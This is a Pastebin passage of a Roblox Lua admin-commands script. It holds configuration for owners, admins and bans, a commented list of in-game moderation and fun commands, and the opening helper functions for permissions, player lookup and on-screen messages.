Advertisement
Guest User

[Roblox] Admin

a guest
Jul 31st, 2015
329
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 139.84 KB | None | 0 0
  1.  
  2. 1.-----------------------------------------------------------------------------------------
  3.  
  4.  
  5. 2.-- Replace harrypotterfan249 with your name c: --
  6.  
  7.  
  8. 3.-----------------------------------------------------------------------------------------
  9.  
  10.  
  11. 4.local owners = {"dellhell1"} -- Are able to set admins who can ban/etc... using :pa name
  12.  
  13.  
  14. 5.local admins = {"Kohltastrophe"} -- Sets admins who can use ban/kick/admin or shutdown
  15.  
  16.  
  17. 6.local tempadmins = {} -- Sets admins who can't use ban/kick/admin or shutdown
  18.  
  19.  
  20. 7.local banland = {"MasterKhaos"} -- Permanently Bans people
  21.  
  22.  
  23. 8.local prefix = ":" -- If you wanna change how your commands start ':'kill noob
  24.  
  25.  
  26. 9.local AutoUpdate = true -- Set to false if you don't want it to automatically update
  27.  
  28.  
  29. 10.local FunCommands = true -- Set to false if you only want the basic commands (For Strict Places)
  30.  
  31.  
  32. 11.---------------------
  33.  
  34.  
  35. 12.-- VIP Admin --
  36.  
  37.  
  38. 13.---------------------
  39.  
  40.  
  41. 14.local VipAdmin = false -- If someone can have admin for owning an item
  42.  
  43.  
  44. 15.local ItemId = 0 -- The item they must own in order to have admin
  45.  
  46.  
  47. 16.---------------------
  48.  
  49.  
  50. 17.-- Group Admin --
  51.  
  52.  
  53. 18.---------------------
  54.  
  55.  
  56. 19.local GroupAdmin = false -- If a certain group can have admin
  57.  
  58.  
  59. 20.local GroupId = 0 -- Sets the group id that can have admin
  60.  
  61.  
  62. 21.local GroupRank = 0 -- Sets what rank and above a person has to be in the group to have admin
  63.  
  64.  
  65. 22.---------------------
  66.  
  67.  
  68. 23.-- Tips and Tricks --
  69.  
  70.  
  71. 24.---------------------
  72.  
  73.  
  74. 25.--[[
  75.  
  76.  
  77. 26.With this admin you can do a command on multiple people at a time;
  78.  
  79.  
  80. 27. :kill me,noob1,noob2,random,team-raiders,nonadmins
  81.  
  82.  
  83. 28.
  84.  
  85.  
  86. 29.You can also use a variety commands for different people;
  87.  
  88.  
  89. 30. all
  90.  
  91.  
  92. 31. others
  93.  
  94.  
  95. 32. me
  96.  
  97.  
  98. 33. team-
  99.  
  100.  
  101. 34. admins
  102.  
  103.  
  104. 35. nonadmins
  105.  
  106.  
  107. 36. random
  108.  
  109.  
  110. 37.--]]
  111.  
  112.  
  113. 38.---------------------
  114.  
  115.  
  116. 39.-- Commands --
  117.  
  118.  
  119. 40.---------------------
  120.  
  121.  
  122. 41.--[[
  123.  
  124.  
  125. 42.-- |Temp Admin Commands| --
  126.  
  127.  
  128. 43.0. clean -- Is a command anyone can use to remove hats/tools lagging up the place
  129.  
  130.  
  131. 44.1. :s print("Hello World") -- Lets you script normally
  132.  
  133.  
  134. 45.2. :ls print("Hello World") -- Lets you script in localscripts
  135.  
  136.  
  137. 46.3. :clear -- Will remove all scripts/localscripts and jails
  138.  
  139.  
  140. 47.4. :m Hello People -- This commands will let you shout a message to everyone on the server
  141.  
  142.  
  143. 48.5. :kill kohl -- Kills the player
  144.  
  145.  
  146. 49.6. :respawn kohl -- Respawns the player
  147.  
  148.  
  149. 50.7. :trip kohl -- Trips the player
  150.  
  151.  
  152. 51.8. :stun kohl -- Stuns the player
  153.  
  154.  
  155. 52.9. :unstun kohl -- Unstuns the player
  156.  
  157.  
  158. 53.10. :jump kohl -- Makes the player jump
  159.  
  160.  
  161. 54.11. :sit kohl -- Makes the player sit
  162.  
  163.  
  164. 55.12. :invisible kohl -- Makes the player invisible
  165.  
  166.  
  167. 56.13. :visible kohl -- Makes the player visible
  168.  
  169.  
  170. 57.14. :explode kohl -- Makes the player explode
  171.  
  172.  
  173. 58.15. :fire kohl -- Sets the player on fire
  174.  
  175.  
  176. 59.16. :unfire kohl -- Removes fire from the player
  177.  
  178.  
  179. 60.17. :smoke kohl -- Adds smoke to the player
  180.  
  181.  
  182. 61.18. :unsmoke kohl -- Removes smoke from the player
  183.  
  184.  
  185. 62.19. :sparkles kohl -- Adds sparkles to the player
  186.  
  187.  
  188. 63.20. :unsparkles kohl -- Removes sparkles from the player
  189.  
  190.  
  191. 64.21. :ff kohl -- Adds a forcefield to the player
  192.  
  193.  
  194. 65.22. :unff kohl -- Removes the forcefield from the player
  195.  
  196.  
  197. 66.23. :punish kohl -- Punishes the player
  198.  
  199.  
  200. 67.24. :unpunish kohl -- Unpunishes the player
  201.  
  202.  
  203. 68.25. :freeze kohl -- Freezes the player
  204.  
  205.  
  206. 69.26. :thaw kohl -- Thaws the player
  207.  
  208.  
  209. 70.27. :heal kohl -- Heals the player
  210.  
  211.  
  212. 71.28. :god kohl -- Makes the player have infinite health
  213.  
  214.  
  215. 72.29. :ungod kohl -- Makes the player have 100 health
  216.  
  217.  
  218. 73.30. :ambient .5 .5 .5 -- Changes the ambient
  219.  
  220.  
  221. 74.31. :brightness .5 -- Changes the brightness
  222.  
  223.  
  224. 75.32. :time 12 -- Changes the time
  225.  
  226.  
  227. 76.33. :fogcolor .5 .5 .5 -- Changes the fogcolor
  228.  
  229.  
  230. 77.34. :fogend 100 -- Changes the fogend
  231.  
  232.  
  233. 78.35. :fogstart 100 -- Changes the fogstart
  234.  
  235.  
  236. 79.36. :removetools kohl -- Removes all tools from the player
  237.  
  238.  
  239. 80.37. :btools kohl -- Gives the player building tools
  240.  
  241.  
  242. 81.38. :give kohl sword -- Gives the player a tool
  243.  
  244.  
  245. 82.39. :damage kohl -- Damages the player
  246.  
  247.  
  248. 83.40. :grav kohl -- Sets the player's gravity to normal
  249.  
  250.  
  251. 84.41. :setgrav kohl 100 -- Sets the player's gravity
  252.  
  253.  
  254. 85.42. :nograv kohl -- Makes the player have 0 gravity
  255.  
  256.  
  257. 86.43. :health kohl 1337 -- Changes the player's health
  258.  
  259.  
  260. 87.44. :speed kohl 1337 -- Changes the player's walkspeed
  261.  
  262.  
  263. 88.45. :name kohl potato -- Changes the player's name
  264.  
  265.  
  266. 89.46. :unname kohl -- Remove the player's name
  267.  
  268.  
  269. 90.47. :team kohl Raiders -- Changes the player's team
  270.  
  271.  
  272. 91.48. :stopmusic -- Will stop all music playing in the server
  273.  
  274.  
  275. 92.49. :teleport kohl potato -- Teleports the player
  276.  
  277.  
  278. 93.50. :change kohl kills 1337 -- Changes a player's stat
  279.  
  280.  
  281. 94.51. :kick kohl -- Removes the player from the game
  282.  
  283.  
  284. 95.52. :infect kohl -- Turns the player into a zombie
  285.  
  286.  
  287. 96.53. :rainbowify kohl -- Turns the player into a rainbow
  288.  
  289.  
  290. 97.54. :flashify kohl -- Turns the player into a strobe
  291.  
  292.  
  293. 98.55. :noobify kohl -- Turns the player into a noob
  294.  
  295.  
  296. 99.56. :ghostify kohl -- Turns the player into a ghost
  297.  
  298.  
  299. 100.57. :goldify kohl -- Turns the player into gold
  300.  
  301.  
  302. 101.58. :shiny kohl -- Makes the player shiny
  303.  
  304.  
  305. 102.59. :normal kohl -- Puts the player back to normal
  306.  
  307.  
  308. 103.60. :trippy kohl -- Spams random colors on the player's screen
  309.  
  310.  
  311. 104.61. :untrippy kohl -- Untrippys the player
  312.  
  313.  
  314. 105.62. :strobe kohl -- Spams white and black on the player's screen
  315.  
  316.  
  317. 106.63. :unstrobe kohl -- Unstrobes the player
  318.  
  319.  
  320. 107.64. :blind kohl -- Blinds the player
  321.  
  322.  
  323. 108.65. :unblind kohl -- Unblinds the player
  324.  
  325.  
  326. 109.66. :guifix kohl -- Will fix trippy/strobe/blind on a player
  327.  
  328.  
  329. 110.67. :fling kohl -- Flings the player
  330.  
  331.  
  332. 111.68. :seizure kohl -- Puts the player in a seizure
  333.  
  334.  
  335. 112.69. :music 1337 -- Plays a sound from the ID
  336.  
  337.  
  338. 113.70. :lock kohl -- Locks the player
  339.  
  340.  
  341. 114.71. :unlock kohl -- Unlocks the player
  342.  
  343.  
  344. 115.72. :removelimbs kohl -- Removes the player's limbs
  345.  
  346.  
  347. 116.73. :jail kohl -- Puts the player in a jail
  348.  
  349.  
  350. 117.74. :unjail kohl -- Removes the jail from the player
  351.  
  352.  
  353. 118.75. :fix -- This will fix the lighting to it's original settings
  354.  
  355.  
  356. 119.76. :fly kohl -- Makes the player fly
  357.  
  358.  
  359. 120.77. :unfly kohl -- Removes fly from the player
  360.  
  361.  
  362. 121.78. :noclip kohl -- Makes the player able to noclip
  363.  
  364.  
  365. 122.79. :clip kohl -- Removes noclipping from the player
  366.  
  367.  
  368. 123.80. :pm kohl Hey bro -- Sends the player a private message
  369.  
  370.  
  371. 124.81. :dog kohl -- Turns the player into a dog
  372.  
  373.  
  374. 125.82. :undog kohl -- Turns the player back to normal
  375.  
  376.  
  377. 126.83. :creeper kohl -- Turns the player into a creeper
  378.  
  379.  
  380. 127.84. :uncreeper kohl -- Turns the player back to normal
  381.  
  382.  
  383. 128.85. :place kohl 1337 -- Sends a teleporation request to a player to go to a different place
  384.  
  385.  
  386. 129.86. :char kohl 261 -- Will make a player look like a different player ID
  387.  
  388.  
  389. 130.87. :unchar kohl -- Will return the player back to normal
  390.  
  391.  
  392. 131.88. :h Hello People -- This will shout a hint to everyone
  393.  
  394.  
  395. 132.89. :rank kohl 109373 -- Will show up a message with the person's Role and Rank in a group
  396.  
  397.  
  398. 133.90. :starttools kohl -- Will give the player starter tools
  399.  
  400.  
  401. 134.91. :sword kohl -- Will give the player a sword
  402.  
  403.  
  404. 135.92. :bighead kohl -- Will make the player's head larger than normal
  405.  
  406.  
  407. 136.93. :minihead kohl -- Will make the player's head smaller than normal
  408.  
  409.  
  410. 137.94. :insert 1337 -- Will insert a model at the speaker's position
  411.  
  412.  
  413. 138.95. :disco -- Will make the server flash random colors
  414.  
  415.  
  416. 139.96. :flash -- Will make the server flash
  417.  
  418.  
  419. 140.97. :admins -- Shows the admin list
  420.  
  421.  
  422. 141.98. :bans -- Shows the banlist
  423.  
  424.  
  425. 142.99. :musiclist -- Shows the music list
  426.  
  427.  
  428. 143.100. :spin kohl -- Spins the player
  429.  
  430.  
  431. 144.101. :cape kohl Really black -- Gives the player a colored cape
  432.  
  433.  
  434. 145.102. :uncape kohl -- Removes the player's cape
  435.  
  436.  
  437. 146.103. :loopheal kohl -- Will constantly heal the player
  438.  
  439.  
  440. 147.104. :loopfling kohl -- Will constantly fling the player
  441.  
  442.  
  443. 148.105. :hat kohl 1337 -- Will give the player a hat under the id of 1337
  444.  
  445.  
  446. 149.106. :unloopheal kohl -- Will remove the loopheal on the player
  447.  
  448.  
  449. 150.107. :unloopfling kohl -- Will remove the loopfling on the player
  450.  
  451.  
  452. 151.108. :unspin kohl -- Removes spin from the player
  453.  
  454.  
  455. 152.109. :tools -- Gives a list of the tools in the lighting
  456.  
  457.  
  458. 153.110. :undisco -- Removes disco effects
  459.  
  460.  
  461. 154.111. :unflash -- Removes flash effects
  462.  
  463.  
  464. 155.112. :resetstats kohl -- Sets all the stats of a player to 0
  465.  
  466.  
  467. 156.113. :gear kohl 1337 -- Gives a player a gear
  468.  
  469.  
  470. 157.114. :cmdbar -- Gives the speaker a command bar
  471.  
  472.  
  473. 158.115. :shirt kohl 1337 -- Changes the player's shirt
  474.  
  475.  
  476. 159.116. :pants kohl 1337 -- Changes the player's pants
  477.  
  478.  
  479. 160.117. :face kohl 1337 -- Changes the player's face
  480.  
  481.  
  482. 161.118. :swagify kohl -- Swagifies the player
  483.  
  484.  
  485. 162.119. :version -- Shows the current version of the admin
  486.  
  487.  
  488. 163.120. :tm 1337 yolo -- Shows a message for 1337 seconds
  489.  
  490.  
  491. 164.121. :countdown 120 -- Shows a countdown message, maxes out at 120 seconds
  492.  
  493.  
  494. 165.122. :clone kohl -- Creates a clone of the player
  495.  
  496.  
  497. 166.123. :lsplr kohl print("yolo") -- Creates a localscript inside of a player
  498.  
  499.  
  500. 167.124. :startergive kohl epic -- Gives a player a gear in their starterpack
  501.  
  502.  
  503. 168.125. :control kohl -- Controls a player
  504.  
  505.  
  506. 169.
  507.  
  508.  
  509. 170.-- |Admin Commands| --
  510.  
  511.  
  512. 171.- :serverlock -- Locks the server
  513.  
  514.  
  515. 172.- :serverunlock -- Unlocks the server
  516.  
  517.  
  518. 173.- :sm Hello World -- Creates a system message
  519.  
  520.  
  521. 174.- :crash kohl -- Crashes a player
  522.  
  523.  
  524. 175.- :admin kohl -- Admins a player
  525.  
  526.  
  527. 176.- :unadmin kohl -- Unadmins a player
  528.  
  529.  
  530. 177.- :ban kohl -- Bans a player
  531.  
  532.  
  533. 178.- :unban kohl -- Unbans a player
  534.  
  535.  
  536. 179.- :loopkill kohl -- Will constantly kill the player
  537.  
  538.  
  539. 180.- :unloopkill kohl -- Will remove the loopkill on the player
  540.  
  541.  
  542. 181.- :logs -- Will show all of the commands any admin has used in a game session
  543.  
  544.  
  545. 182.- :shutdown -- Shutsdown the server
  546.  
  547.  
  548. 183.
  549.  
  550.  
  551. 184.-- |Owner Commands| --
  552.  
  553.  
  554. 185.- :pa kohl -- Makes someone a super admin
  555.  
  556.  
  557. 186.- :unpa kohl -- Removes a super admin
  558.  
  559.  
  560. 187.- :nuke kohl -- Creates a nuke on kohl
  561.  
  562.  
  563. 188.
  564.  
  565.  
  566. 189.-- |True Owner Commands| --
  567.  
  568.  
  569. 190.- :oa kohl -- Makes someone an owner
  570.  
  571.  
  572. 191.- :unoa kohl -- Removes an owner
  573.  
  574.  
  575. 192.- :settings -- Shows settings for the commands
  576.  
  577.  
  578. 193.--]]
  579.  
  580.  
  581. 194.---------------------
  582.  
  583.  
  584. 195.-- Main Script --
  585.  
  586.  
  587. 196.---------------------
  588.  
  589.  
  590. 197.for i, v in pairs(game:service("Workspace"):children()) do if v:IsA("StringValue") and v.Value:sub(1,2) == "AA" then v:Destroy() end end
  591.  
  592.  
  593. 198.
  594.  
  595.  
  596. 199.function CHEESE()
  597.  
  598.  
  599. 200.if game:service("Lighting"):findFirstChild("KACV2") then
  600.  
  601.  
  602. 201.owners = {} admins = {} tempadmins = {} banland = {}
  603.  
  604.  
  605. 202.for i,v in pairs(game.Lighting.KACV2:children()) do
  606.  
  607.  
  608. 203.if v.Name == "Owner" then table.insert(owners, v.Value) end
  609.  
  610.  
  611. 204.if v.Name == "Admin" then table.insert(admins, v.Value) end
  612.  
  613.  
  614. 205.if v.Name == "TempAdmin" then table.insert(tempadmins, v.Value) end
  615.  
  616.  
  617. 206.if v.Name == "Banland" then table.insert(banland, v.Value) end
  618.  
  619.  
  620. 207.if v.Name == "Prefix" then prefix = v.Value end
  621.  
  622.  
  623. 208.if v.Name == "FunCommands" then FunCommands = v.Value end
  624.  
  625.  
  626. 209.if v.Name == "GroupAdmin" then GroupAdmin = v.Value end
  627.  
  628.  
  629. 210.if v.Name == "GroupId" then GroupId = v.Value end
  630.  
  631.  
  632. 211.if v.Name == "GroupRank" then GroupRank = v.Value end
  633.  
  634.  
  635. 212.if v.Name == "VipAdmin" then VipAdmin = v.Value end
  636.  
  637.  
  638. 213.if v.Name == "ItemId" then ItemId = v.Value end
  639.  
  640.  
  641. 214.end
  642.  
  643.  
  644. 215.game:service("Lighting"):findFirstChild("KACV2"):Destroy()
  645.  
  646.  
  647. 216.end
  648.  
  649.  
  650. 217.
  651.  
  652.  
  653. 218.local origsettings = {abt = game.Lighting.Ambient, brt = game.Lighting.Brightness, time = game.Lighting.TimeOfDay, fclr = game.Lighting.FogColor, fe = game.Lighting.FogEnd, fs = game.Lighting.FogStart}
  654.  
  655.  
  656. 219.local lobjs = {}
  657.  
  658.  
  659. 220.local objects = {}
  660.  
  661.  
  662. 221.local logs = {}
  663.  
  664.  
  665. 222.local nfs = ""
  666.  
  667.  
  668. 223.local slock = false
  669.  
  670.  
  671. 224.
  672.  
  673.  
  674. 225.function GetTime()
  675.  
  676.  
  677. 226.local hour = math.floor((tick()%86400)/60/60) local min = math.floor(((tick()%86400)/60/60-hour)*60)
  678.  
  679.  
  680. 227.if min < 10 then min = "0"..min end
  681.  
  682.  
  683. 228.return hour..":"..min
  684.  
  685.  
  686. 229.end
  687.  
  688.  
  689. 230.
  690.  
  691.  
  692. 231.function ChkOwner(str)
  693.  
  694.  
  695. 232.for i = 1, #owners do if str:lower() == owners[i]:lower() then return true end end
  696.  
  697.  
  698. 233.return false
  699.  
  700.  
  701. 234.end
  702.  
  703.  
  704. 235.
  705.  
  706.  
  707. 236.function ChkAdmin(str,ck)
  708.  
  709.  
  710. 237.for i = 1, #owners do if str:lower() == owners[i]:lower() then return true end end
  711.  
  712.  
  713. 238.for i = 1, #admins do if str:lower() == admins[i]:lower() then return true end end
  714.  
  715.  
  716. 239.for i = 1, #tempadmins do if str:lower() == tempadmins[i]:lower() and not ck then return true end end
  717.  
  718.  
  719. 240.return false
  720.  
  721.  
  722. 241.end
  723.  
  724.  
  725. 242.
  726.  
  727.  
  728. 243.function ChkGroupAdmin(plr)
  729.  
  730.  
  731. 244.if GroupAdmin then
  732.  
  733.  
  734. 245.if plr:IsInGroup(GroupId) and plr:GetRankInGroup(GroupId) >= GroupRank then return true end
  735.  
  736.  
  737. 246.return false
  738.  
  739.  
  740. 247.end
  741.  
  742.  
  743. 248.end
  744.  
  745.  
  746. 249.
  747.  
  748.  
  749. 250.function ChkBan(str) for i = 1, #banland do if str:lower() == banland[i]:lower() then return true end end return false end
  750.  
  751.  
  752. 251.
  753.  
  754.  
  755. 252.function GetPlr(plr, str)
  756.  
  757.  
  758. 253.local plrz = {} str = str:lower()
  759.  
  760.  
  761. 254.if str == "all" then plrz = game.Players:children()
  762.  
  763.  
  764. 255.elseif str == "others" then for i, v in pairs(game.Players:children()) do if v ~= plr then table.insert(plrz, v) end end
  765.  
  766.  
  767. 256.else
  768.  
  769.  
  770. 257.local sn = {1} local en = {}
  771.  
  772.  
  773. 258.for i = 1, #str do if str:sub(i,i) == "," then table.insert(sn, i+1) table.insert(en,i-1) end end
  774.  
  775.  
  776. 259.for x = 1, #sn do
  777.  
  778.  
  779. 260.if (sn[x] and en[x] and str:sub(sn[x],en[x]) == "me") or (sn[x] and str:sub(sn[x]) == "me") then table.insert(plrz, plr)
  780.  
  781.  
  782. 261.elseif (sn[x] and en[x] and str:sub(sn[x],en[x]) == "random") or (sn[x] and str:sub(sn[x]) == "random") then table.insert(plrz, game.Players:children()[math.random(#game.Players:children())])
  783.  
  784.  
  785. 262.elseif (sn[x] and en[x] and str:sub(sn[x],en[x]) == "admins") or (sn[x] and str:sub(sn[x]) == "admins") then if ChkAdmin(plr.Name, true) then for i, v in pairs(game.Players:children()) do if ChkAdmin(v.Name, false) then table.insert(plrz, v) end end end
  786.  
  787.  
  788. 263.elseif (sn[x] and en[x] and str:sub(sn[x],en[x]) == "nonadmins") or (sn[x] and str:sub(sn[x]) == "nonadmins") then for i, v in pairs(game.Players:children()) do if not ChkAdmin(v.Name, false) then table.insert(plrz, v) end end
  789.  
  790.  
  791. 264.elseif (sn[x] and en[x] and str:sub(sn[x],en[x]):sub(1,4) == "team") then
  792.  
  793.  
  794. 265.if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") and str:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x],en[x]):sub(6)) == 1 then
  795.  
  796.  
  797. 266.for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end end break
  798.  
  799.  
  800. 267.end end end
  801.  
  802.  
  803. 268.elseif (sn[x] and str:sub(sn[x]):sub(1,4):lower() == "team") then
  804.  
  805.  
  806. 269.if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") and str:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x]):sub(6)) == 1 then
  807.  
  808.  
  809. 270.for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end end break
  810.  
  811.  
  812. 271.end end end
  813.  
  814.  
  815. 272.else
  816.  
  817.  
  818. 273.for a, plyr in pairs(game.Players:children()) do
  819.  
  820.  
  821. 274.if (sn[x] and en[x] and str:sub(sn[x],en[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x],en[x])) == 1) or (sn[x] and str:sub(sn[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x])) == 1) or (str ~= "" and plyr.Name:lower():find(str) == 1) then
  822.  
  823.  
  824. 275.table.insert(plrz, plyr) break
  825.  
  826.  
  827. 276.end
  828.  
  829.  
  830. 277.end
  831.  
  832.  
  833. 278.end
  834.  
  835.  
  836. 279.end
  837.  
  838.  
  839. 280.end
  840.  
  841.  
  842. 281.return plrz
  843.  
  844.  
  845. 282.end
  846.  
  847.  
  848. 283.
  849.  
  850.  
  851. 284.function Hint(str, plrz, time)
  852.  
  853.  
  854. 285.for i, v in pairs(plrz) do
  855.  
  856.  
  857. 286.if v and v:findFirstChild("PlayerGui") then
  858.  
  859.  
  860. 287.coroutine.resume(coroutine.create(function()
  861.  
  862.  
  863. 288.local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "HintGUI"
  864.  
  865.  
  866. 289.local bg = Instance.new("Frame", scr) bg.Name = "bg" bg.BackgroundColor3 = Color3.new(0,0,0) bg.BorderSizePixel = 0 bg.BackgroundTransparency = 1 bg.Size = UDim2.new(1,0,0,22) bg.Position = UDim2.new(0,0,0,-2) bg.ZIndex = 8
  867.  
  868.  
  869. 290.local msg = Instance.new("TextLabel", bg) msg.BackgroundTransparency = 1 msg.ZIndex = 9 msg.Name = "msg" msg.Position = UDim2.new(0,0,0) msg.Size = UDim2.new(1,0,1,0) msg.Font = "Arial" msg.Text = str msg.FontSize = "Size18" msg.TextColor3 = Color3.new(1,1,1) msg.TextStrokeColor3 = Color3.new(1,1,1) msg.TextStrokeTransparency = .8
  870.  
  871.  
  872. 291.coroutine.resume(coroutine.create(function() for i = 20, 0, -1 do bg.BackgroundTransparency = .3+((.7/20)*i) msg.TextTransparency = ((1/20)*i) msg.TextStrokeTransparency = .8+((.2/20)*i) wait(1/44) end end))
  873.  
  874.  
  875. 292.if not time then wait((#str/19)+2.5) else wait(time) end
  876.  
  877.  
  878. 293.coroutine.resume(coroutine.create(function() if scr.Parent == v.PlayerGui then for i = 0, 20 do msg.TextTransparency = ((1/20)*i) msg.TextStrokeTransparency = .8+((.2/20)*i) bg.BackgroundTransparency = .3+((.7/20)*i) wait(1/44) end scr:Destroy() end end))
  879.  
  880.  
  881. 294.end))
  882.  
  883.  
  884. 295.end
  885.  
  886.  
  887. 296.end
  888.  
  889.  
  890. 297.end
  891.  
  892.  
  893. 298.
  894.  
  895.  
  896. 299.function Message(ttl, str, scroll, plrz, time)
  897.  
  898.  
  899. 300.for i, v in pairs(plrz) do
  900.  
  901.  
  902. 301.if v and v:findFirstChild("PlayerGui") then
  903.  
  904.  
  905. 302.coroutine.resume(coroutine.create(function()
  906.  
  907.  
  908. 303.local scr = Instance.new("ScreenGui") scr.Name = "MessageGUI"
  909.  
  910.  
  911. 304.local bg = Instance.new("Frame", scr) bg.Name = "bg" bg.BackgroundColor3 = Color3.new(0,0,0) bg.BorderSizePixel = 0 bg.BackgroundTransparency = 1 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 8
  912.  
  913.  
  914. 305.local title = Instance.new("TextLabel", scr) title.Name = "title" title.BackgroundTransparency = 1 title.BorderSizePixel = 0 title.Size = UDim2.new(1,0,0,10) title.ZIndex = 9 title.Font = "ArialBold" title.FontSize = "Size36" title.Text = ttl title.TextYAlignment = "Top" title.TextColor3 = Color3.new(1,1,1) title.TextStrokeColor3 = Color3.new(1,1,1) title.TextStrokeTransparency = .8
  915.  
  916.  
  917. 306.local msg = title:clone() msg.Parent = scr msg.Name = "msg" msg.Position = UDim2.new(.0625,0,0) msg.Size = UDim2.new(.875,0,1,0) msg.Font = "Arial" msg.Text = "" msg.FontSize = "Size24" msg.TextYAlignment = "Center" msg.TextWrapped = true
  918.  
  919.  
  920. 307.scr.Parent = v.PlayerGui
  921.  
  922.  
  923. 308.coroutine.resume(coroutine.create(function() for i = 20, 0, -1 do bg.BackgroundTransparency = .3+((.7/20)*i) msg.TextTransparency = ((1/20)*i) msg.TextStrokeTransparency = .8+((.2/20)*i) title.TextTransparency = ((1/20)*i) title.TextStrokeTransparency = .8+((.2/20)*i) wait(1/44) end end))
  924.  
  925.  
  926. 309.if scroll then if not time then for i = 1, #str do msg.Text = msg.Text .. str:sub(i,i) wait(1/19) end wait(2.5) else for i = 1, #str do msg.Text = msg.Text .. str:sub(i,i) wait(1/19) end wait(time-(#str/19)) end
  927.  
  928.  
  929. 310.else if not time then msg.Text = str wait((#str/19)+2.5) else msg.Text = str wait(time) end end
  930.  
  931.  
  932. 311.coroutine.resume(coroutine.create(function() if scr.Parent == v.PlayerGui then for i = 0, 20 do bg.BackgroundTransparency = .3+((.7/20)*i) msg.TextTransparency = ((1/20)*i) msg.TextStrokeTransparency = .8+((.2/20)*i) title.TextTransparency = ((1/20)*i) title.TextStrokeTransparency = .8+((.2/20)*i) wait(1/44) end scr:Destroy() end end))
  933.  
  934.  
  935. 312.end))
  936.  
  937.  
  938. 313.end
  939.  
  940.  
  941. 314.end
  942.  
  943.  
  944. 315.end
  945.  
  946.  
  947. 316.
  948.  
  949.  
  950. 317.function RemoveMessage()
  951.  
  952.  
  953. 318.for i,v in pairs(game.Players:children()) do
  954.  
  955.  
  956. 319.if v and v:findFirstChild("PlayerGui") then
  957.  
  958.  
  959. 320.for q,ms in pairs(v.PlayerGui:children()) do
  960.  
  961.  
  962. 321.if ms.Name == "MessageGUI" then
  963.  
  964.  
  965. 322.coroutine.resume(coroutine.create(function() for i = 0, 20 do ms.bg.BackgroundTransparency = .3+((.7/20)*i) ms.msg.TextTransparency = ((1/20)*i) ms.msg.TextStrokeTransparency = .8+((.2/20)*i) ms.title.TextTransparency = ((1/20)*i) ms.title.TextStrokeTransparency = .8+((.2/20)*i) wait(1/44) end ms:Destroy() end))
  966.  
  967.  
  968. 323.elseif ms.Name == "HintGUI" then
  969.  
  970.  
  971. 324.coroutine.resume(coroutine.create(function() for i = 0, 20 do ms.msg.TextTransparency = ((1/20)*i) ms.msg.TextStrokeTransparency = .8+((.2/20)*i) ms.bg.BackgroundTransparency = .3+((.7/20)*i) wait(1/44) end ms:Destroy() end))
  972.  
  973.  
  974. 325.end
  975.  
  976.  
  977. 326.end
  978.  
  979.  
  980. 327.end
  981.  
  982.  
  983. 328.end
  984.  
  985.  
  986. 329.end
  987.  
  988.  
  989. 330.
  990.  
  991.  
  992. 331._G["Message"] = function(p1,p2,p3) Message(p1,p2,false,game.Players:children(),p3) end
  993.  
  994.  
  995. 332._G["RemoveMessage"] = RemoveMessage()
  996.  
  997.  
  998. 333.
  999.  
  1000.  
  1001. 334.function Output(str, plr)
  1002.  
  1003.  
  1004. 335.coroutine.resume(coroutine.create(function()
  1005.  
  1006.  
  1007. 336.local b, e = loadstring(str)
  1008.  
  1009.  
  1010. 337.if not b and plr:findFirstChild("PlayerGui") then
  1011.  
  1012.  
  1013. 338.local scr = Instance.new("ScreenGui", plr.PlayerGui) game:service("Debris"):AddItem(scr,5)
  1014.  
  1015.  
  1016. 339.local main = Instance.new("Frame", scr) main.Size = UDim2.new(1,0,1,0) main.BorderSizePixel = 0 main.BackgroundTransparency = 1 main.ZIndex = 8
  1017.  
  1018.  
  1019. 340.local err = Instance.new("TextLabel", main) err.Text = "Line "..e:match("\:(%d+\:.*)") err.BackgroundColor3 = Color3.new(0,0,0) err.BackgroundTransparency = .3 err.BorderSizePixel = 0 err.Size = UDim2.new(1,0,0,40) err.Position = UDim2.new(0,0,.5,-20) err.ZIndex = 9 err.Font = "ArialBold" err.FontSize = "Size24" err.TextColor3 = Color3.new(1,1,1) err.TextStrokeColor3 = Color3.new(1,1,1) err.TextStrokeTransparency = .8
  1020.  
  1021.  
  1022. 341.return
  1023.  
  1024.  
  1025. 342.end
  1026.  
  1027.  
  1028. 343.end))
  1029.  
  1030.  
  1031. 344.end
  1032.  
  1033.  
  1034. 345.
  1035.  
  1036.  
  1037. 346.function Noobify(char)
  1038.  
  1039.  
  1040. 347.if char and char:findFirstChild("Torso") then
  1041.  
  1042.  
  1043. 348.if char:findFirstChild("Shirt") then char.Shirt.Parent = char.Torso end
  1044.  
  1045.  
  1046. 349.if char:findFirstChild("Pants") then char.Pants.Parent = char.Torso end
  1047.  
  1048.  
  1049. 350.for a, sc in pairs(char:children()) do if sc.Name == "ify" then sc:Destroy() end end
  1050.  
  1051.  
  1052. 351.local cl = Instance.new("StringValue", char) cl.Name = "ify" cl.Parent = char
  1053.  
  1054.  
  1055. 352.for q, prt in pairs(char:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or not prt.Parent:findFirstChild("NameTag", true)) then
  1056.  
  1057.  
  1058. 353.prt.Transparency = 0 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("Bright yellow")
  1059.  
  1060.  
  1061. 354.if prt.Name:find("Leg") then prt.BrickColor = BrickColor.new("Br. yellowish green") elseif prt.Name == "Torso" then prt.BrickColor = BrickColor.new("Bright blue") end
  1062.  
  1063.  
  1064. 355.local tconn = prt.Touched:connect(function(hit) if hit and hit.Parent and game.Players:findFirstChild(hit.Parent.Name) and cl.Parent == char then Noobify(hit.Parent) elseif cl.Parent ~= char then tconn:disconnect() end end)
  1065.  
  1066.  
  1067. 356.cl.Changed:connect(function() if cl.Parent ~= char then tconn:disconnect() end end)
  1068.  
  1069.  
